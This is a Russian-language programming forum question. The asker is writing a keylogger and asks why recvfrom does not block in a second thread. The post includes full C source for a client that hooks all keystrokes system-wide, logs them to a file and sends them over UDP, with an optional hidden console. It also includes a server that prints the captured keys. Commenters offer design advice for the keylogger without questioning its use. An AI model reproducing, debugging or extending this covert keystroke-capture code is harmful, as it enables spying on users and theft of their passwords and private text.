# Во втором потоке не ждет ответа recvfrom

Tags: c, многопоточность, winapi, сокет

Столкнулся с проблемой, когда функция `recvfrom`, будучи сама по себе блокирующей, внезапно становится неблокирующей (что видно на клиенте), если создать новый поток - не ждет данные, а просто пропускает выполнение. Как сделать так, чтобы `recvfrom` клиента ожидала данные с сервера **конкретно во втором потоке**?

Прилагаю коды клиента...

```
#define _WINSOCK_DEPRECATED_NO_WARNINGS
#define _CRT_SECURE_NO_WARNINGS
#include <WinSock2.h>
#include <stdio.h>
#include <malloc.h>
#include <locale.h>
#include <stdlib.h>
#include <windows.h>
char message[7];
char buf[2]; 
DWORD str[2];
DWORD mass[1];
SOCKADDR_IN si_other;
int fl = 0, Hsumbol = 0, flag = 1;
int slen = sizeof(si_other);
int error;
SOCKET connection()
{
    WSADATA wsa;
    if (FAILED(WSAStartup(MAKEWORD(2, 2), &wsa)))
    {
        error = WSAGetLastError();
        WSACleanup();
        return 0;
    }
    SOCKET s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if (!s)
    {
        error = WSAGetLastError();
        WSACleanup();
        return 0;
    }
    memset((char *)&si_other, 0, sizeof(si_other));
    si_other.sin_family = AF_INET;
    si_other.sin_port = htons(16435);
    si_other.sin_addr.S_un.S_addr = inet_addr("127.0.0.1");
    return s;
}
SOCKET s;
LRESULT CALLBACK KeyboardHook(int nCode, WPARAM wParam, LPARAM lParam)
{
    HKL c = GetKeyboardLayout(0);
    if ((GetKeyState(VK_LSHIFT) & GetKeyState(VK_LMENU) & 0x0100) || (GetKeyState(VK_LSHIFT) & GetKeyState(VK_LCONTROL) & 0x0100)) c = ActivateKeyboardLayout(HKL_PREV, 0);
    if (nCode == HC_ACTION && (wParam == WM_KEYDOWN || wParam == WM_SYSKEYDOWN))
    {
            BYTE keyarray[256];
            GetKeyboardState(keyarray);
            DWORD vk = ((LPKBDLLHOOKSTRUCT)lParam)->vkCode;
            ToAsciiEx(vk, ((LPKBDLLHOOKSTRUCT)lParam)->scanCode,keyarray, (LPWORD)buf,0,c);
            Hsumbol++;
            FILE* f = fopen("symbols.txt", "a");
            fprintf(f, "%lu ", vk);
            fprintf(f, "%lu ", (DWORD)buf[0]);
            fprintf(f, "%lu ", (DWORD)buf[1]);
            fclose(f);
            if (vk == 0x1b)
            {
                PostQuitMessage(0);
            }
    }
    return CallNextHookEx(NULL, nCode, wParam, lParam);
}
DWORD WINAPI sender()
{
    flag = 0;
    int a = 0;
    memset(message, '\0', 7);
    recvfrom(s, (char *)message, 6, 0, (struct sockaddr *) &si_other, &slen);
    //error = WSAGetLastError();
    //printf("%i\n",error);
    if (strcmp(message, "all ok") == 0)
    {
        char zam[1];
        zam[0] = Hsumbol;
        FILE *f;
        sendto(s, zam, sizeof(zam), 0, (struct sockaddr *) &si_other, slen);
        f = fopen("symbols.txt", "r");
        int j = 1, k = 1;
        while ((j - 1) < Hsumbol)
        {
            fscanf(f, "%lu", &mass[0]);
            fseek(f, 1, SEEK_CUR);
            fscanf(f, "%lu", &str[0]);
            fseek(f, 1, SEEK_CUR);
            fscanf(f, "%lu", &str[1]);
            sendto(s, mass, sizeof(mass), 0, (struct sockaddr *) &si_other, slen);
            sendto(s, str, sizeof(str), 0, (struct sockaddr *) &si_other, slen);
            j++;
        }
        Hsumbol = 0;
        fclose(f);
        f = fopen("symbols.txt", "w");
        fclose(f);
        flag = 1;
    }
    return 0;
}
void main()
{
    //ShowWindow(GetConsoleWindow(), SW_HIDE);
    if (!(s = connection())) exit(1);
    setlocale(LC_ALL, "RUSSIAN");
    FILE *f = fopen("symbols.txt", "w");
    fclose(f);
    HANDLE thread;
    HHOOK hook = SetWindowsHookEx(WH_KEYBOARD_LL, KeyboardHook, GetModuleHandle(NULL), 0);
    if (hook)
    {
        while (WaitMessage())
        {
            if(flag)
                thread = CreateThread(NULL, 0, sender, NULL, 0, NULL);
            MSG msg = { 0 };
            while(PeekMessage(&msg, NULL, 0, 0, PM_REMOVE))
            {
                if (msg.message == WM_QUIT)
                {
                    UnhookWindowsHookEx(hook);
                    closesocket(s);
                    WSACleanup();
                    exit(1);
                }
                TranslateMessage(&msg);
                DispatchMessage(&msg);
            }
        }
    }
}
```

...И сервера

```
#define _CRT_SECURE_NO_WARNINGS
#include <stdio.h>
#include <locale.h>
#include <WinSock2.h>
#include <Windows.h>
DWORD string[3];
SOCKADDR_IN si_other;
BOOL system_key(const DWORD vkCode)
{
    switch (vkCode)
    {
    case VK_ESCAPE:
        printf("[ESC]");
        break;
    case VK_RMENU:
        printf("[R ALT]");
        break;
    case VK_RETURN:
        printf("[ENTER]\n");
        break;
    case VK_LMENU:
        printf("[L ALT]");
        break;
    case VK_TAB:
        printf("[TAB]\t");
        break;
    case VK_BACK:
        printf("[BS]");
        break;
    case VK_CAPITAL:
        printf("[CAPS]");
        break;
    case VK_DELETE:
        printf("[DEL]");
        break;
    case VK_RSHIFT:
        printf("[R SHIFT]");
        break;
    case VK_LSHIFT:
        printf("[L SHIFT]");
        break;
    case VK_RCONTROL:
        printf("[R CTRL]");
        break;
    case VK_LCONTROL:
        printf("[L CTRL]");
        break;
    case 0x90:
        printf("[NUM LOCK]");
        break;
    case 0x5D:
        printf("[R MENU]");
        break;
    case 0x25:
        printf("[ARROW L]");
        break;
    case 0x26:
        printf("[ARROW UP]");
        break;
    case 0x27:
        printf("[ARROW R]");
        break;
    case 0x28:
        printf("[ARROW DOWN]");
        break;
    case 0x70:
        printf("[F1]");
        break;
    case 0x71:
        printf("[F2]");
        break;
    case 0x72:
        printf("[F3]");
        break;
    case 0x73:
        printf("[F4]");
        break;
    case 0x74:
        printf("[F5]");
        break;
    case 0x75:
        printf("[F6]");
        break;
    case 0x76:
        printf("[F7]");
        break;
    case 0x77:
        printf("[F8]");
        break;
    case 0x78:
        printf("[F9]");
        break;
    case 0x79:
        printf("[F10]");
        break;
    case 0x7A:
        printf("[F11]");
        break;
    case 0x7B:
        printf("[F12]");
        break;
    case VK_INSERT:
        printf("[INSERT]");
        break;
    case VK_HOME:
        printf("[HOME]");
        break;
    case VK_END:
        printf("[END]");
        break;
    case VK_PAUSE:
        printf("[PAUSE]");
        break;
    case VK_PRINT:
        printf("[PRTSC]");
        break;
    case VK_VOLUME_UP:
        printf("[VOLUME_UP]");
        break;
    case VK_VOLUME_DOWN:
        printf("[VOLUME_DOWN]");
        break;
    case VK_VOLUME_MUTE:
        printf("[VOLUME_MUTE]");
        break;
    case VK_MEDIA_PLAY_PAUSE:
        printf("[MEDIA_PLAY_PAUSE]");
        break;
    case VK_MEDIA_STOP:
        printf("[MEDIA_STOP]");
        break;
    case VK_MEDIA_PREV_TRACK:
        printf("[|<<]");
        break;
    case VK_MEDIA_NEXT_TRACK:
        printf("[>>|]");
        break;
    case VK_SCROLL:
        printf("[SCR_LK]");
        break;
    case VK_SLEEP:
        printf("[SLEEP]");
        break;
    default:  return FALSE;
    }
    return TRUE;
}
SOCKET listen_socket()
{
    printf("i'm working - server-1!\n");
    WSADATA wsa;
    if (WSAStartup(MAKEWORD(2, 2), &wsa))
    {
        printf("winsock not initialized\n");
        WSACleanup();
        return 0;
    }
    printf("winsock initialized\n");
    SOCKET s = socket(AF_INET, SOCK_DGRAM, 0);

    if (!s)
    {
        printf("socket not initialized\n");
        WSACleanup();
        return 0;
    }
    printf("socket initialized\n");
    si_other.sin_family = AF_INET;
    si_other.sin_addr.s_addr = INADDR_ANY;
    si_other.sin_port = htons(16435);
    if (bind(s, (struct sockaddr*)&si_other, sizeof(si_other)) == SOCKET_ERROR)
    {
        printf("error bind socket\n");
        closesocket(s);
        WSACleanup();
        return 0;
    }
    printf("binding success\n");
    return s;
}

void main()
{
    setlocale(LC_ALL, "RUSSIAN");
    SOCKET s;
    int slen;
    int i=0;
    s = listen_socket();
    DWORD syskey;
    char key[2];
    char un[1];
    slen = sizeof(si_other);
    while (1)
    {
        sendto(s, "all ok", sizeof("all ok"), 0, (struct sockaddr *) &si_other, slen);
        int j = 0;
        recvfrom(s, un, sizeof(un), 0, (struct sockaddr *) &si_other, &slen);
        i = un[0];
        while (j < i)
        {
            recvfrom(s, string, sizeof(string), 0, (struct sockaddr *) &si_other, &slen);
            syskey = string[0];
            recvfrom(s, string, sizeof(string), 0, (struct sockaddr *) &si_other, &slen);
            key[0] = (char)string[0];
            key[1] = (char)string[1];
            if (!system_key(syskey)) printf("%s", key);
            j++;
        }
        if (syskey == 0x1b) break;
    }
    printf("End of working keylogger\n");
    system("pause");
}
```

Comment: так ведь вроде эту функцию, также как и send, в любом случае нельзя использовать одновременно в нескольких потоках так как ОС в таком случае не гарантирует никакую целостность данных. твой огромный код на голых сях я не смотрел, но думаю что по-любому можно отказаться от второго потока тем более для recv, на крайний использовать семафор

Comment: @KG Семафор немного не то... Если использовать семафор в основном потоке, то он блочит всю программу(что мне очень не надо),но при это мне нужно, чтобы программа ожидала ответа от сервера сколько нужно, при этом выполняя код в нормальном режиме. Потоки пришлись бы как нельзя кстати(ибо если recvfrom заблочил другой поток в ожидании ответа, то это хорошо)

Comment: ну тык не используй семафор в основном потоке, у меня tcp абсолютно всегда и весь крутится НЕ в основном потоке (ну кроме connect если прога совсем простенькая)... И если занимаешься архитектурой то не быдлокодь на Си который как раз отвлекает от архитектуры и заставляет заморачиваться с деталями, а пиши на ЯВУ, будет легче и тебе и тем кто отвечает на вопрос

Comment: @KG Это программа - кейлогер. Мне его надо написать. И на яве он, по собранной мною информации, не пишется. посему нужно мне оформить второй поток(!!!)

Comment: почему именно на яве? вы серьезно думаете, что за 20 лет не появилось под винду не одного средства нативной компиляции? да хоть delphi и билдер, все лучше чем си. и зачем для кейлоггера recv в разных потоках? у кейлоггера всего-то должно быть цикл с GetAsyncKeyState, получил что нажата клавиша - отправил на сервер сообщение, получил от сервера ответ, и снова ждем GetAsyncKeyState. всего 1 поток

Comment: @KG а если сервер недоступен? скажем, нет коннекта? Надо ждать коннекта, а значит, ждать ответа от сервера. recvfrom блокирует основной поток в любом случае, а в основном потоке у нас висит замечательная функция, которая отлавливает нажатия клавиш. То есть, либо нужно перемещать recvfrom во второй поток, либо же что то еще, чего я не знаю.
Но, как я выяснил, recvfrom по какой то неведомой мне причине **не** блочит второй поток...

Comment: "а в основном потоке у нас висит замечательная функция, которая отлавливает нажатия клавиш" еще раз повторяю, нажатия в одном потоке, а ВСЯ работа с сетью во втором и свяжи два этих потока через очередь и т.п. конечно со своим Си ты мало что знаешь